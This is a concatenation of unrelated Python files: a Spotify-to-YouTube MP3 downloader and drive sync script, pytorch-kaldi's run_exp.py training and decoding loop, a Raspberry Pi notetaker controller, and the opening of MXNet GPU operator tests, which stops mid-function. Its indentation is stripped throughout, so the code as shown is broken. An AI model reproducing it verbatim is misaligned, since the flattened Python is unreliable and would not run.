songIds = []
# loop over the songs url list, and store ids
configs['playlist']['spotify_parsed'].append({
'type': 'songs_list',
'song_ids': pl,
})
else:
user = pl[pl.find('user:') + 5:pl.find('playlist:') - 1]
pl_id = pl[pl.find('playlist:') + 9:]
configs['playlist']['spotify_parsed'].append({
'user': user,
'playlist_id': pl_id,
'type': 'playlist',
})
def process_diff_files(diff, source, dest):
files_to_remove = diff['files_to_remove']
files_to_add = diff['files_to_add']
for r in files_to_remove:
d = dest + r
try:
os.remove(d)
p('Removed file: ' + d)
dirs = d[:d.rfind('/')]
remove_dir_if_empty(dirs)
except:
p("Hmm could not remove the file or dir")
t = len(files_to_add)
for f in files_to_add:
d = dest + f
dirs = d[:d.rfind('/')]
if not os.path.exists(dirs + '/'):
p('Creating folder ' + dirs)
os.makedirs(dirs)
if not os.path.exists(dest + f):
if not os.path.exists(source + f):
p('The source file ' + f + ' does not exists')
else:
p('Copying file ' + str(t) + '/' + str(len(files_to_add)) + ' - ' + dest + f)
shutil.copyfile(source + f, dest + f)
else:
p('Already exists ' + str(t) + '/' + str(len(files_to_add)) + ' - ' + dest + f)
t -= 1
p('Files are in sync!')
def remove_dir_if_empty(a):
files = os.listdir(a)
if len(files) == 0:
d = a[:a.rfind('/')]
p('Removing folder because its empty ' + a)
os.removedirs(a)
def diff_files(files_dir, compare_dir, files=None):
dirs = os.listdir(compare_dir)
if files is None:
files = []
f_dirs = os.listdir(files_dir)
for d in f_dirs:
f_files = os.listdir(files_dir + d)
for f2 in f_files:
files.append(d + '/' + f2)
files_to_remove = []
files_to_add = []
for l in dirs:
folder = l + '/'
disk_files = os.listdir(compare_dir + folder)
for df in disk_files:
file = folder + df
found = False
for f in files:
if file == f:
found = True
break
if not found:
files_to_remove.append(file)
for f in files:
exists = os.path.exists(compare_dir + f)
if not exists:
files_to_add.append(f)
o = {
'files_to_remove': files_to_remove,
'files_to_add': files_to_add,
}
# print(o)
return o
running_threads = 0
total_playlist_cd = 0
total_playlist = 0
total_tracks_cd = 0
total_tracks = 0
def p2(s):
p('pl:' + str(total_playlist_cd) + '/' + str(total_playlist) + '-tracks:' + str(total_tracks_cd) + '/' + str(
total_tracks) + ' - ' + s)
def clean_temp():
p('Cleaning temp')
files = os.listdir('./')
for f in files:
if f.find('.webm') > -1:
p('Removing temp file: ' + f)
os.remove('./' + f)
process_playlist_threads = 0
parsed_playlist = []
hr = '───────────────────'
def process_playlist():
p('Starting sync')
parse_spotify_playlist_config()
p('Download dir: ' + configs['download_dir'])
if not os.path.exists(configs['download_dir']):
p('The download directory does not exists')
exit(1)
clean_temp()
p('Getting playlists')
playlist = get_spotify_playlist(configs['playlist']['spotify_parsed'])
global total_playlist
global total_playlist_cd
global total_tracks
global total_tracks_cd
global parsed_playlist
songs_not_found_list = []
parsed_playlist = []
total_playlist = len(playlist)
total_playlist_cd = total_playlist
total_tracks = 0
total_tracks_cd = 0
p(hr)
p('Found ' + str(total_playlist) + ' playlists')
global process_playlist_threads
process_playlist_threads = 0
for pl in playlist:
def get_playlist(pl2):
global process_playlist_threads
global total_tracks
global parsed_playlist
if (pl2['user_id'] == False):
tracks = get_spotify_tracks_individualy(pl2['tracks'])
else:
tracks = get_spotify_tracks(pl2['user_id'], pl2['playlist_id'])
total_tracks += len(tracks)
p('Got ' + str(len(tracks)) + ' tracks from ' + pl2['name'])
pl2['tracks'] = tracks
parsed_playlist.append(pl2)
process_playlist_threads -= 1
while process_playlist_threads > configs['concurrent_connections']:
time.sleep(0.5)
get_playlist(pl)
process_playlist_threads += 1
# t = threading.Thread(target=get_playlist, args=(pl,))
# t.daemon = True
# t.start()
while process_playlist_threads != 0:
time.sleep(0.5)
p('Playlist scan complete, found ' + str(total_tracks) + ' total tracks')
p(hr)
total_tracks_cd = total_tracks
diff_file_paths = []
p2('Starting..')
for pl in parsed_playlist:
folder_path = configs['download_dir'] + pl['path']
for track_index, track in enumerate(pl['tracks']):
def process_track(pl, folder_path, track, track_index):
global running_threads
global total_tracks_cd
running_threads += 1
pre_text = pl['name'][:10] + ' | ' + track['name']
p(hr + ' ' + pre_text)
p2(str(running_threads) + 'T | ' + pre_text)
diff_file_paths.append(pl['path'] + track['path'])
file_path = folder_path + track['path']
p2(str(running_threads) + 'T | ' + pre_text + ': output to: ' + file_path)
if os.path.exists(file_path):
p2(str(running_threads) + 'T | ' + pre_text + ': file already exists, skipping')
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
sys.exit()
search_term = track['search_term']
p2(str(running_threads) + 'T | ' + pre_text + ': searching yt for ' + search_term)
all_results = search_youtube(search_term)
p2(str(running_threads) + 'T | ' + pre_text + ': got ' + str(len(all_results)) + ' results')
# have to remove unrelated results!!!
# we are selecting wrong tracks because of the diff.
# sometimes the diff of unrelated songs match exactly.
terms = clean_string(track['artist'] + ' ' + track['name'])
terms_list = terms.split(' ')
required_matched_terms = []
for t in terms_list:
if len(t) > 1:
required_matched_terms.append(t)
results = []
required_matches = len(required_matched_terms)
for r in all_results:
matches = 0
search_in = r['title'] + ' ' + r['channel'] + ' ' + r['description']
edge_case_search_in = r['title'] + ' ' + r['channel']
edge_case_search_in2 = clean_string(edge_case_search_in).lower()
unrelated = False
r2 = clean_string(search_in).lower()
for t in terms_list:
t2 = clean_string(t).lower()
if len(t) > 1 and r2.find(t2) != -1:
matches += 1
if required_matches < 4 and matches != required_matches:
unrelated = True
elif required_matches >= 4:
# if a song has a long name, considering words beyond 5 are long,
# then percent will be calculated, more than n% will qualify
required_words_to_matches = configs['song_selection'][
'min_percent_threshold'] * required_matches / 100
if matches < round(required_words_to_matches):
unrelated = True
# match_percent = matches * 100 / required_matches
# if match_percent < configs['song_selection']['min_percent_threshold']: # matches less than 60 percent will disqualify
# detect edge cases here live, instrumental etc
edge_cases = configs['song_selection']['edge_cases']
for e in edge_cases:
if edge_case_search_in2.find(e.lower()) != -1 and terms.find(e.lower()) == -1:
unrelated = True
break
if not configs['song_selection']['use_filtering']:
unrelated = False
if not unrelated:
results.append(r)
# compare the first X no. of tracks ? and check for the lowest difference in duration
def select_result(re):
lowest_index = 0
lowest_diff = 1000
for index, r in enumerate(re):
diff = abs(int(r['duration_seconds']) - int(track['duration']))
if diff < lowest_diff and index < configs['song_selection']['diff_track_seconds_limit']:
lowest_diff = diff
lowest_index = index
p2(str(running_threads) + 'T | ' + pre_text + ': length diff = ' + str(lowest_diff) + ' seconds')
p2(str(running_threads) + 'T | ' + pre_text + ': selecting = "' + re[lowest_index]['title'] + '"')
return [lowest_index, lowest_diff]
if len(results) == 0:
p2(str(running_threads) + 'T | ' + pre_text + ': results were not found')
songs_not_found_list.append(pre_text + ', term used: ' + track['search_term'])
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
sys.exit()
sr = select_result(results)
result_index = sr[0]
result_diff = sr[1]
selected_result = results[result_index]
try:
p2(str(running_threads) + 'T | ' + pre_text + ': downloading audio')
video_path = download_video(selected_result['video_id'], track['path'])
except:
# one more try.
p2(str(running_threads) + 'T | ' + pre_text + ':failed to download, one more try?')
results.pop(result_index)
sr = select_result(results)
result_index = sr[0]
result_diff = sr[1]
selected_result = results[result_index]
p(str(running_threads) + 'T | ' + pre_text + ':could not download video, selecting different one')
try:
video_path = download_video(selected_result['video_id'], track['path'])
except:
p2(str(running_threads) + 'T | ' + pre_text + ':failed to download the song again, giving up!')
running_threads -= 1
sys.exit()
# this was the selected result
track['selected_result'] = selected_result['video_id'] + ' ' + selected_result['title'] + ' I:' + str(
result_index) + ' D:' + str(result_diff)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
# def in_thread():
p2(str(running_threads) + 'T | ' + pre_text + ': converting to mp3')
convert_to_mp3(video_path, file_path)
time.sleep(.1)
os.remove(video_path)
if configs['tag_mp3']:
p2(str(running_threads) + 'T | ' + pre_text + ': downloading album art')
p2(str(running_threads) + 'T | ' + pre_text + ': adding meta-data to mp3')
tag_mp3(file_path, track)
p2(str(running_threads) + 'T | ' + pre_text + ': saved to ' + file_path)
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
while running_threads > configs['threads'] - 1:
time.sleep(.01)
# time.sleep(random.uniform(0, 1))
# process_track(pl, folder_path, track, track_index)
t = threading.Thread(target=process_track, args=(pl, folder_path, track, track_index))
t.daemon = True
t.start()
total_playlist_cd -= 1
p('Waiting for threads to finish :' + str(running_threads))
while running_threads != 0:
print('... Running threads: ' + str(running_threads))
time.sleep(2)
p('Checking for removed files')
diffed_files = diff_files(configs['download_dir'], configs['download_dir'], files=diff_file_paths)
if len(diffed_files['files_to_remove']):
p('Removing files')
process_diff_files(diffed_files, configs['download_dir'], configs['download_dir'])
sync_drive()
p('Songs not found: ' + str(len(songs_not_found_list)))
for s in songs_not_found_list:
p('not found: ' + s)
p('Completed')
def sync_drive():
"""
Sync download drive with sync drives
:rtype: object
"""
for drive in configs['sync_download_dir']:
if os.path.exists(drive):
p('Syncing files with ' + drive)
drive_diff_files = diff_files(configs['download_dir'], drive)
process_diff_files(drive_diff_files, configs['download_dir'], drive)
else:
p('The path ' + drive + ' does not exists atm, skipping')
if args.d:
print('ok')
if args.s:
process_playlist()
if args.ds:
sync_drive()
|
run_exp.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
from __future__ import print_function
import os
import sys
import glob
import configparser
import numpy as np
from utils import check_cfg,create_lists,create_configs, compute_avg_performance, \
read_args_command_line, run_shell,compute_n_chunks, get_all_archs,cfg_item2sec, \
dump_epoch_results, create_curves,change_lr_cfg,expand_str_ep, do_validation_after_chunk, \
get_val_info_file_path, get_val_cfg_file_path, get_chunks_after_which_to_validate
from data_io import read_lab_fea_refac01 as read_lab_fea
from shutil import copyfile
from core import read_next_chunk_into_shared_list_with_subprocess, extract_data_from_shared_list, convert_numpy_to_torch
import re
from distutils.util import strtobool
import importlib
import math
import multiprocessing
def _run_forwarding_in_subprocesses(config):
use_cuda=strtobool(config['exp']['use_cuda'])
if use_cuda:
return False
else:
return True
def _is_first_validation(ck, N_ck_tr, config):
def _get_nr_of_valid_per_epoch_from_config(config):
if not 'nr_of_valid_per_epoch' in config['exp']:
return 1
return int(config['exp']['nr_of_valid_per_epoch'])
val_chunks = get_chunks_after_which_to_validate(N_ck_tr, _get_nr_of_valid_per_epoch_from_config(config))
if ck == val_chunks[0]:
return True
return False
def _max_nr_of_parallel_forwarding_processes(config):
if 'max_nr_of_parallel_forwarding_processes' in config['forward']:
return int(config['forward']['max_nr_of_parallel_forwarding_processes'])
return -1
# Reading global cfg file (first argument-mandatory file)
cfg_file=sys.argv[1]
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Reading and parsing optional arguments from command line (e.g.,--optimization,lr=0.002)
[section_args,field_args,value_args]=read_args_command_line(sys.argv,config)
# Output folder creation
out_folder=config['exp']['out_folder']
if not os.path.exists(out_folder):
os.makedirs(out_folder+'/exp_files')
# Log file path
log_file=config['exp']['out_folder']+'/log.log'
# Read, parse, and check the config file
cfg_file_proto=config['cfg_proto']['cfg_proto']
[config,name_data,name_arch]=check_cfg(cfg_file,config,cfg_file_proto)
# Read cfg file options
is_production=strtobool(config['exp']['production'])
cfg_file_proto_chunk=config['cfg_proto']['cfg_proto_chunk']
cmd=config['exp']['cmd']
N_ep=int(config['exp']['N_epochs_tr'])
N_ep_str_format='0'+str(max(math.ceil(np.log10(N_ep)),1))+'d'
tr_data_lst=config['data_use']['train_with'].split(',')
valid_data_lst=config['data_use']['valid_with'].split(',')
forward_data_lst=config['data_use']['forward_with'].split(',')
max_seq_length_train=config['batches']['max_seq_length_train']
forward_save_files=list(map(strtobool,config['forward']['save_out_file'].split(',')))
print("- Reading config file......OK!")
# Copy the global cfg file into the output folder
cfg_file=out_folder+'/conf.cfg'
with open(cfg_file, 'w') as configfile:
config.write(configfile)
# Load the run_nn function from core libriary
# The run_nn is a function that process a single chunk of data
run_nn_script=config['exp']['run_nn_script'].split('.py')[0]
module = importlib.import_module('core')
run_nn=getattr(module, run_nn_script)
# Splitting data into chunks (see out_folder/additional_files)
create_lists(config)
# Writing the config files
create_configs(config)
print("- Chunk creation......OK!\n")
# create res_file
res_file_path=out_folder+'/res.res'
res_file = open(res_file_path, "w")
res_file.close()
# Learning rates and architecture-specific optimization parameters
arch_lst=get_all_archs(config)
lr={}
auto_lr_annealing={}
improvement_threshold={}
halving_factor={}
pt_files={}
for arch in arch_lst:
lr[arch]=expand_str_ep(config[arch]['arch_lr'],'float',N_ep,'|','*')
if len(config[arch]['arch_lr'].split('|'))>1:
auto_lr_annealing[arch]=False
else:
auto_lr_annealing[arch]=True
improvement_threshold[arch]=float(config[arch]['arch_improvement_threshold'])
halving_factor[arch]=float(config[arch]['arch_halving_factor'])
pt_files[arch]=config[arch]['arch_pretrain_file']
# If production, skip training and forward directly from last saved models
if is_production:
ep = N_ep-1
N_ep = 0
model_files = {}
for arch in pt_files.keys():
model_files[arch] = out_folder+'/exp_files/final_'+arch+'.pkl'
op_counter=1 # used to dected the next configuration file from the list_chunks.txt
# Reading the ordered list of config file to process
cfg_file_list = [line.rstrip('\n') for line in open(out_folder+'/exp_files/list_chunks.txt')]
cfg_file_list.append(cfg_file_list[-1])
# A variable that tells if the current chunk is the first one that is being processed:
processed_first=True
data_name=[]
data_set=[]
data_end_index=[]
fea_dict=[]
lab_dict=[]
arch_dict=[]
# --------TRAINING LOOP--------#
for ep in range(N_ep):
tr_loss_tot=0
tr_error_tot=0
tr_time_tot=0
val_time_tot=0
print('------------------------------ Epoch %s / %s ------------------------------'%(format(ep, N_ep_str_format),format(N_ep-1, N_ep_str_format)))
for tr_data in tr_data_lst:
# Compute the total number of chunks for each training epoch
N_ck_tr=compute_n_chunks(out_folder,tr_data,ep,N_ep_str_format,'train')
N_ck_str_format='0'+str(max(math.ceil(np.log10(N_ck_tr)),1))+'d'
# ***Epoch training***
for ck in range(N_ck_tr):
# paths of the output files (info,model,chunk_specific cfg file)
info_file=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.info'
if ep+ck==0:
model_files_past={}
else:
model_files_past=model_files
model_files={}
for arch in pt_files.keys():
model_files[arch]=info_file.replace('.info','_'+arch+'.pkl')
config_chunk_file=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.cfg'
# update learning rate in the cfg file (if needed)
change_lr_cfg(config_chunk_file,lr,ep)
# if this chunk has not already been processed, do training...
if not(os.path.exists(info_file)):
print('Training %s chunk = %i / %i' %(tr_data,ck+1, N_ck_tr))
# getting the next chunk
next_config_file=cfg_file_list[op_counter]
# run chunk processing
[data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict]=run_nn(data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict,config_chunk_file,processed_first,next_config_file)
# update the first_processed variable
processed_first=False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: training epoch %i, chunk %i not done! File %s does not exist.\nSee %s \n" % (ep,ck,info_file,log_file))
sys.exit(0)
# update the operation counter
op_counter+=1
# update pt_file (used to initialized the DNN for the next chunk)
for pt_arch in pt_files.keys():
pt_files[pt_arch]=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'_'+pt_arch+'.pkl'
# remove previous pkl files
if len(model_files_past.keys())>0:
for pt_arch in pt_files.keys():
if os.path.exists(model_files_past[pt_arch]):
os.remove(model_files_past[pt_arch])
if do_validation_after_chunk(ck, N_ck_tr, config):
if not _is_first_validation(ck, N_ck_tr, config):
valid_peformance_dict_prev = valid_peformance_dict
valid_peformance_dict = {}
for valid_data in valid_data_lst:
N_ck_valid = compute_n_chunks(out_folder, valid_data, ep, N_ep_str_format, 'valid')
N_ck_str_format_val = '0' + str(max(math.ceil(np.log10(N_ck_valid)), 1)) + 'd'
for ck_val in range(N_ck_valid):
info_file = get_val_info_file_path(out_folder, valid_data, ep, ck, ck_val, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)
config_chunk_file = get_val_cfg_file_path(out_folder, valid_data, ep, ck, ck_val, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)
if not(os.path.exists(info_file)):
print('Validating %s chunk = %i / %i' %(valid_data, ck_val+1, N_ck_valid))
next_config_file = cfg_file_list[op_counter]
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict = run_nn(data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, config_chunk_file, processed_first, next_config_file)
processed_first = False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: validation on epoch %i, chunk %i, valid chunk %i of dataset %s not done! File %s does not exist.\nSee %s \n" % (ep, ck, ck_val, valid_data, info_file, log_file))
sys.exit(0)
op_counter+=1
valid_info_lst = sorted(glob.glob(get_val_info_file_path(out_folder, valid_data, ep, ck, None, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)))
valid_loss, valid_error, valid_time = compute_avg_performance(valid_info_lst)
valid_peformance_dict[valid_data] = [valid_loss,valid_error,valid_time]
val_time_tot += valid_time
if not _is_first_validation(ck, N_ck_tr, config):
err_valid_mean = np.mean(np.asarray(list(valid_peformance_dict.values()))[:,1])
err_valid_mean_prev = np.mean(np.asarray(list(valid_peformance_dict_prev.values()))[:,1])
for lr_arch in lr.keys():
if ep < N_ep-1 and auto_lr_annealing[lr_arch]:
if ((err_valid_mean_prev-err_valid_mean)/err_valid_mean)<improvement_threshold[lr_arch]:
new_lr_value = float(lr[lr_arch][ep])*halving_factor[lr_arch]
for i in range(ep + 1, N_ep):
lr[lr_arch][i] = str(new_lr_value)
# Training Loss and Error
tr_info_lst = sorted(glob.glob(out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'*.info'))
[tr_loss,tr_error,tr_time] = compute_avg_performance(tr_info_lst)
tr_loss_tot=tr_loss_tot+tr_loss
tr_error_tot=tr_error_tot+tr_error
tr_time_tot=tr_time_tot+tr_time
tot_time=tr_time + val_time_tot
# Print results in both res_file and stdout
dump_epoch_results(res_file_path, ep, tr_data_lst, tr_loss_tot, tr_error_tot, tot_time, valid_data_lst, valid_peformance_dict, lr, N_ep)
# Training has ended, copy the last .pkl to final_arch.pkl for production
for pt_arch in pt_files.keys():
if os.path.exists(model_files[pt_arch]) and not os.path.exists(out_folder+'/exp_files/final_'+pt_arch+'.pkl'):
copyfile(model_files[pt_arch], out_folder+'/exp_files/final_'+pt_arch+'.pkl')
# --------FORWARD--------#
for forward_data in forward_data_lst:
# Compute the number of chunks
N_ck_forward=compute_n_chunks(out_folder,forward_data,ep,N_ep_str_format,'forward')
N_ck_str_format='0'+str(max(math.ceil(np.log10(N_ck_forward)),1))+'d'
processes = list()
info_files = list()
for ck in range(N_ck_forward):
if not is_production:
print('Testing %s chunk = %i / %i' %(forward_data,ck+1, N_ck_forward))
else:
print('Forwarding %s chunk = %i / %i' %(forward_data,ck+1, N_ck_forward))
# output file
info_file=out_folder+'/exp_files/forward_'+forward_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.info'
config_chunk_file=out_folder+'/exp_files/forward_'+forward_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.cfg'
# Do forward if the chunk was not already processed
if not(os.path.exists(info_file)):
# Doing forward
# getting the next chunk
next_config_file=cfg_file_list[op_counter]
# run chunk processing
if _run_forwarding_in_subprocesses(config):
shared_list = list()
output_folder = config['exp']['out_folder']
save_gpumem = strtobool(config['exp']['save_gpumem'])
use_cuda=strtobool(config['exp']['use_cuda'])
p = read_next_chunk_into_shared_list_with_subprocess(read_lab_fea, shared_list, config_chunk_file, is_production, output_folder, wait_for_process=True)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(shared_list)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {'input': data_set_inp, 'ref': data_set_ref}
data_end_index = {'fea': data_end_index_fea,'lab': data_end_index_lab}
p = multiprocessing.Process(target=run_nn, kwargs={'data_name': data_name, 'data_set': data_set, 'data_end_index': data_end_index, 'fea_dict': fea_dict, 'lab_dict': lab_dict, 'arch_dict': arch_dict, 'cfg_file': config_chunk_file, 'processed_first': False, 'next_config_file': None})
processes.append(p)
if _max_nr_of_parallel_forwarding_processes(config) != -1 and len(processes) > _max_nr_of_parallel_forwarding_processes(config):
processes[0].join()
del processes[0]
p.start()
else:
[data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict]=run_nn(data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict,config_chunk_file,processed_first,next_config_file)
processed_first=False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: forward chunk %i of dataset %s not done! File %s does not exist.\nSee %s \n" % (ck,forward_data,info_file,log_file))
sys.exit(0)
info_files.append(info_file)
# update the operation counter
op_counter+=1
if _run_forwarding_in_subprocesses(config):
for process in processes:
process.join()
for info_file in info_files:
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: File %s does not exist. Forwarding did not suceed.\nSee %s \n" % (info_file,log_file))
sys.exit(0)
# --------DECODING--------#
dec_lst=glob.glob( out_folder+'/exp_files/*_to_decode.ark')
forward_data_lst=config['data_use']['forward_with'].split(',')
forward_outs=config['forward']['forward_out'].split(',')
forward_dec_outs=list(map(strtobool,config['forward']['require_decoding'].split(',')))
for data in forward_data_lst:
for k in range(len(forward_outs)):
if forward_dec_outs[k]:
print('Decoding %s output %s' %(data,forward_outs[k]))
info_file=out_folder+'/exp_files/decoding_'+data+'_'+forward_outs[k]+'.info'
# create decode config file
config_dec_file=out_folder+'/decoding_'+data+'_'+forward_outs[k]+'.conf'
config_dec = configparser.ConfigParser()
config_dec.add_section('decoding')
for dec_key in config['decoding'].keys():
config_dec.set('decoding',dec_key,config['decoding'][dec_key])
# add graph_dir, datadir, alidir
lab_field=config[cfg_item2sec(config,'data_name',data)]['lab']
# Production case, we don't have labels
if not is_production:
pattern='lab_folder=(.*)\nlab_opts=(.*)\nlab_count_file=(.*)\nlab_data_folder=(.*)\nlab_graph=(.*)'
alidir=re.findall(pattern,lab_field)[0][0]
config_dec.set('decoding','alidir',os.path.abspath(alidir))
datadir=re.findall(pattern,lab_field)[0][3]
config_dec.set('decoding','data',os.path.abspath(datadir))
graphdir=re.findall(pattern,lab_field)[0][4]
config_dec.set('decoding','graphdir',os.path.abspath(graphdir))
else:
pattern='lab_data_folder=(.*)\nlab_graph=(.*)'
datadir=re.findall(pattern,lab_field)[0][0]
config_dec.set('decoding','data',os.path.abspath(datadir))
graphdir=re.findall(pattern,lab_field)[0][1]
config_dec.set('decoding','graphdir',os.path.abspath(graphdir))
# The ali dir is supposed to be in exp/model/ which is one level ahead of graphdir
alidir = graphdir.split('/')[0:len(graphdir.split('/'))-1]
alidir = "/".join(alidir)
config_dec.set('decoding','alidir',os.path.abspath(alidir))
with open(config_dec_file, 'w') as configfile:
config_dec.write(configfile)
out_folder=os.path.abspath(out_folder)
files_dec=out_folder+'/exp_files/forward_'+data+'_ep*_ck*_'+forward_outs[k]+'_to_decode.ark'
out_dec_folder=out_folder+'/decode_'+data+'_'+forward_outs[k]
if not(os.path.exists(info_file)):
# Run the decoder
cmd_decode=cmd+config['decoding']['decoding_script_folder'] +'/'+ config['decoding']['decoding_script']+ ' '+os.path.abspath(config_dec_file)+' '+ out_dec_folder + ' \"'+ files_dec + '\"'
run_shell(cmd_decode,log_file)
# remove ark files if needed
if not forward_save_files[k]:
list_rem=glob.glob(files_dec)
for rem_ark in list_rem:
os.remove(rem_ark)
# Print WER results and write info file
cmd_res='./check_res_dec.sh '+out_dec_folder
wers=run_shell(cmd_res,log_file).decode('utf-8')
res_file = open(res_file_path, "a")
res_file.write('%s\n'%wers)
print(wers)
# Saving Loss and Err as .txt and plotting curves
if not is_production:
create_curves(out_folder, N_ep, valid_data_lst)
|
Controller.py
|
from Keytracker import Keytracker
from Synchronizer import Synchronizer
from threading import Thread
from collections import deque
# REPLACE THIS WITH YOUR WORKING DIRECTORY FOR YOUR PROJECT
WORKING_DIRECTORY = "/home/pi/Projects/Headless-Keyboard-Notetaker"
class Controller:
def __init__(self):
self.__keytracker = Keytracker(self)
self.__synchronizer = Synchronizer()
self.__filename_threads = deque()
def start(self):
self.__synchronizer.start()
self.__keytracker.start()
self.__join_all_threads()
def alert_new_file(self, filename):
self.__drop_dead_threads()
t = Thread(target = self.__synchronizer.alert_new_file, args = (filename,))
t.start()
self.__filename_threads.append(t)
# Allow any closed filename threads to be garbage collected
def __drop_dead_threads(self):
for i in range(len(self.__filename_threads)):
t = self.__filename_threads.pop()
if t.is_alive():
self.__filename_threads.appendleft(t)
else:
t.join()
def __join_all_threads(self):
self.__synchronizer.close()
self.__synchronizer.join()
while len(self.__filename_threads) > 0:
self.__filename_threads.pop().join()
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
import scipy.sparse as sps
import mxnet.ndarray.sparse as mxsps
import itertools
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
